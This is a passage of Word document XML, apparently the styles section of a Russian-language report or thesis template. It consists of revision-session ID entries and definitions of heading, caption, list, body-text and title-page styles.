    <w:rsid w:val="00B621AD"/>
    <w:rsid w:val="00B64613"/>
    <w:rsid w:val="00B6695A"/>
    <w:rsid w:val="00B67ECB"/>
    <w:rsid w:val="00B7279A"/>
    <w:rsid w:val="00B85E65"/>
    <w:rsid w:val="00B912DB"/>
    <w:rsid w:val="00B92788"/>
    <w:rsid w:val="00B94B91"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BA0160"/>
    <w:rsid w:val="00BA2948"/>
    <w:rsid w:val="00BA34F3"/>
    <w:rsid w:val="00BA511C"/>
    <w:rsid w:val="00BA5EA6"/>
    <w:rsid w:val="00BB4541"/>
    <w:rsid w:val="00BC00E1"/>
    <w:rsid w:val="00BC0996"/>
    <w:rsid w:val="00BC2A59"/>
    <w:rsid w:val="00BC4A02"/>
    <w:rsid w:val="00BC4E73"/>
    <w:rsid w:val="00BD5000"/>
    <w:rsid w:val="00BD596B"/>
    <w:rsid w:val="00BD6F9F"/>
    <w:rsid w:val="00BD6FD9"/>
    <w:rsid w:val="00BD7BFC"/>
    <w:rsid w:val="00BE08B8"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BE624B"/>
    <w:rsid w:val="00BF3486"/>
    <w:rsid w:val="00C032BC"/>
    <w:rsid w:val="00C0558B"/>
    <w:rsid w:val="00C064F7"/>
    <w:rsid w:val="00C11060"/>
    <w:rsid w:val="00C1106E"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C36498"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C42015"/>
    <w:rsid w:val="00C4219A"/>
    <w:rsid w:val="00C425A1"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C47B3A"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C512BA"/>
    <w:rsid w:val="00C52126"/>
    <w:rsid w:val="00C53921"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C61593"/>
    <w:rsid w:val="00C631CA"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C66707"/>
    <w:rsid w:val="00C7350E"/>
    <w:rsid w:val="00C75BF1"/>
    <w:rsid w:val="00C76285"/>
    <w:rsid w:val="00C76E8B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C8133E"/>
    <w:rsid w:val="00C83BF0"/>
    <w:rsid w:val="00C8400A"/>
    <w:rsid w:val="00C9034C"/>
    <w:rsid w:val="00C92B9E"/>
    <w:rsid w:val="00C92F7B"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CA2D8B"/>
    <w:rsid w:val="00CA2FCB"/>
    <w:rsid w:val="00CA4FB7"/>
    <w:rsid w:val="00CA64E6"/>
    <w:rsid w:val="00CA6D21"/>
    <w:rsid w:val="00CA6FC8"/>
    <w:rsid w:val="00CB0E2D"/>
    <w:rsid w:val="00CB36B6"/>
    <w:rsid w:val="00CB3F17"/>
    <w:rsid w:val="00CB5A38"/>
    <w:rsid w:val="00CB7CE9"/>
    <w:rsid w:val="00CC17D4"/>
    <w:rsid w:val="00CC55B3"/>
    <w:rsid w:val="00CD1DE3"/>
    <w:rsid w:val="00CD4390"/>
    <w:rsid w:val="00CD6678"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CE2C1D"/>
    <w:rsid w:val="00CE3041"/>
    <w:rsid w:val="00CE605C"/>
    <w:rsid w:val="00CF36EC"/>
    <w:rsid w:val="00CF3A74"/>
    <w:rsid w:val="00CF3C8D"/>
    <w:rsid w:val="00CF536D"/>
    <w:rsid w:val="00D06AF7"/>
    <w:rsid w:val="00D0720C"/>
    <w:rsid w:val="00D10F68"/>
    <w:rsid w:val="00D116B2"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D16912"/>
    <w:rsid w:val="00D16FA5"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D258A7"/>
    <w:rsid w:val="00D26A34"/>
    <w:rsid w:val="00D27889"/>
    <w:rsid w:val="00D30FBD"/>
    <w:rsid w:val="00D31DAF"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D476D4"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D5341C"/>
    <w:rsid w:val="00D609FB"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D621B2"/>
    <w:rsid w:val="00D6437B"/>
    <w:rsid w:val="00D67CA8"/>
    <w:rsid w:val="00D712AF"/>
    <w:rsid w:val="00D71BD9"/>
    <w:rsid w:val="00D740EB"/>
    <w:rsid w:val="00D76CFF"/>
    <w:rsid w:val="00D822E5"/>
    <w:rsid w:val="00D917EF"/>
    <w:rsid w:val="00D9379F"/>
    <w:rsid w:val="00D93DFA"/>
    <w:rsid w:val="00DA214F"/>
    <w:rsid w:val="00DA417D"/>
    <w:rsid w:val="00DB23BC"/>
    <w:rsid w:val="00DB37D5"/>
    <w:rsid w:val="00DB3853"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DC1090"/>
    <w:rsid w:val="00DC1720"/>
    <w:rsid w:val="00DC74A4"/>
    <w:rsid w:val="00DC7DCA"/>
    <w:rsid w:val="00DD1427"/>
    <w:rsid w:val="00DD1680"/>
    <w:rsid w:val="00DD5766"/>
    <w:rsid w:val="00DD5DD8"/>
    <w:rsid w:val="00DD762B"/>
    <w:rsid w:val="00DE0922"/>
    <w:rsid w:val="00DE4186"/>
    <w:rsid w:val="00DE5CBD"/>
    <w:rsid w:val="00DE69B7"/>
    <w:rsid w:val="00DE77D1"/>
    <w:rsid w:val="00E0191C"/>
    <w:rsid w:val="00E01AC1"/>
    <w:rsid w:val="00E04A9D"/>
    <w:rsid w:val="00E05FAE"/>
    <w:rsid w:val="00E06C9D"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E14683"/>
    <w:rsid w:val="00E2108B"/>
    <w:rsid w:val="00E232B4"/>
    <w:rsid w:val="00E25F81"/>
    <w:rsid w:val="00E31785"/>
    <w:rsid w:val="00E326F1"/>
    <w:rsid w:val="00E34DA4"/>
    <w:rsid w:val="00E45D07"/>
    <w:rsid w:val="00E50C88"/>
    <w:rsid w:val="00E608CF"/>
    <w:rsid w:val="00E63175"/>
    <w:rsid w:val="00E64059"/>
    <w:rsid w:val="00E66BBD"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E700AD"/>
    <w:rsid w:val="00E70DEF"/>
    <w:rsid w:val="00E748AD"/>
    <w:rsid w:val="00E76317"/>
    <w:rsid w:val="00E77A1F"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E87CB3"/>
    <w:rsid w:val="00E91FFA"/>
    <w:rsid w:val="00E94673"/>
    <w:rsid w:val="00EA17C1"/>
    <w:rsid w:val="00EA1A18"/>
    <w:rsid w:val="00EA2997"/>
    <w:rsid w:val="00EA5084"/>
    <w:rsid w:val="00EA69F0"/>
    <w:rsid w:val="00EA7488"/>
    <w:rsid w:val="00EB1CF4"/>
    <w:rsid w:val="00EB38E5"/>
    <w:rsid w:val="00EB479F"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC249B"/>
    <w:rsid w:val="00ED0ED6"/>
    <w:rsid w:val="00ED25A5"/>
    <w:rsid w:val="00ED5FA0"/>
    <w:rsid w:val="00ED78FB"/>
    <w:rsid w:val="00EE6574"/>
    <w:rsid w:val="00EF2F4F"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F00177"/>
    <w:rsid w:val="00F00385"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F04AC1"/>
    <w:rsid w:val="00F05A20"/>
    <w:rsid w:val="00F11705"/>
    <w:rsid w:val="00F1184A"/>
    <w:rsid w:val="00F11870"/>
    <w:rsid w:val="00F1606B"/>
    <w:rsid w:val="00F17E58"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F269DF"/>
    <w:rsid w:val="00F26B8F"/>
    <w:rsid w:val="00F30DBC"/>
    <w:rsid w:val="00F3102D"/>
    <w:rsid w:val="00F35736"/>
    <w:rsid w:val="00F366B0"/>
    <w:rsid w:val="00F4070D"/>
    <w:rsid w:val="00F42C40"/>
    <w:rsid w:val="00F440D7"/>
    <w:rsid w:val="00F45E35"/>
    <w:rsid w:val="00F5098C"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F53FBF"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F63AE5"/>
    <w:rsid w:val="00F64B51"/>
    <w:rsid w:val="00F65842"/>
    <w:rsid w:val="00F66355"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F71209"/>
    <w:rsid w:val="00F72023"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F75FCA"/>
    <w:rsid w:val="00F7699F"/>
    <w:rsid w:val="00F84CA8"/>
    <w:rsid w:val="00F86865"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00F93B53"/>
    <w:rsid w:val="00F94FED"/>
    <w:rsid w:val="00F953F8"/>
    <w:rsid w:val="00FA267A"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FA481E"/>
    <w:rsid w:val="00FA64CA"/>
    <w:rsid w:val="00FA6EA6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FC11BD"/>
    <w:rsid w:val="00FC268A"/>
    <w:rsid w:val="00FD2035"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FD49C7"/>
    <w:rsid w:val="00FE1032"/>
    <w:rsid w:val="00FE14B8"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE36FD"/>
    <w:rsid w:val="00FE3AA8"/>
    <w:rsid w:val="00FE4784"/>
    <w:rsid w:val="00FE7711"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF00EF"/>
    <w:rsid w:val="00FF0892"/>
    <w:rsid w:val="00FF131A"/>
    <w:rsid w:val="00FF6364"/>
    <w:rsid w:val="00FF6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57C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0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7">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="006426CC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="39"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
      </w:tabs>
      <w:jc w:val="center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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="39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7"/>
    <w:next w:val="a7"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="39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Title"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F8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Название рисунка"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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">
    <w:name w:val="Название таблицы"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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c">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F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1">
    <w:name w:val="Программный код"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81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f3">
    <w:name w:val="Текст внутри таблицы"/>
    <w:basedOn w:val="a7"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="006426CC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8"/>
    <w:link w:val="21"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E25F8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8"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F8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8"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81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7"/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="42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7"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4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4">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="32"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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7"/>
    <w:next w:val="a7"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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7"/>
    <w:next w:val="a7"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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7"/>
    <w:next w:val="a7"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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5">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af6">
    <w:name w:val="Электронная подпись Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="33"/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="31"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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9"/>
    <w:uiPriority w:val="60"/>
    <w:locked/>
    <w:rsid w:val="00E25F8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7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="41"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="afb">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a9"/>
    <w:uiPriority w:val="59"/>
    <w:locked/>
    <w:rsid w:val="00E25F8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c">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="ad"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afe"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff">
    <w:name w:val="Введение_заключение"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a7"/>
    <w:link w:val="aff0"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afe">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81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7"/>
    <w:link w:val="aff1"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="47"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Список_БУКВЫ"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff2"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="48"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Список_ЦИФРЫ"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff3"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="50"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="Список_2_уровня"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="49"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a5">
    <w:name w:val="Список источников"/>
    <w:basedOn w:val="a7"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="46"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="aff5"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="aff4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="aff7"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="aff6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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9">
    <w:name w:val="_Название рисунка"/>
    <w:basedOn w:val="affa"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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b">
    <w:name w:val="_Рисунок"/>
    <w:basedOn w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affa">
    <w:name w:val="caption"/>
    <w:aliases w:val="Вставленный объект"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="affc"/>
    <w:uiPriority w:val="35"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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d">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="affc">
    <w:name w:val="Название объекта Знак"/>
    <w:aliases w:val="Вставленный объект Знак"/>
    <w:link w:val="affa"/>
    <w:uiPriority w:val="35"/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="affe"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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f">
    <w:name w:val="Основной текст + Курсив"/>
    <w:aliases w:val="Интервал 0 pt15"/>
    <w:basedOn w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="10"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affe">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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f0">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff1">
    <w:name w:val="Подпись к картинке_"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff2"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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f2">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="30"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="Основной текст (6)_"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="62"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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7"/>
    <w:link w:val="61"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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f3">
    <w:name w:val="Подпись к картинке + Курсив"/>
    <w:aliases w:val="Интервал 0 pt11"/>
    <w:basedOn w:val="afff1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="10"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff4">
    <w:name w:val="Основного текста"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff5"/>
    <w:qFormat/>
    <w:rsid w:val="00301C5A"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff6">
    <w:name w:val="Шапка для титульного листа"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff7"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff5">
    <w:name w:val="Основного текста Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff4"/>
    <w:rsid w:val="00301C5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff8">
    <w:name w:val="Заголовок на титульном листе"/>
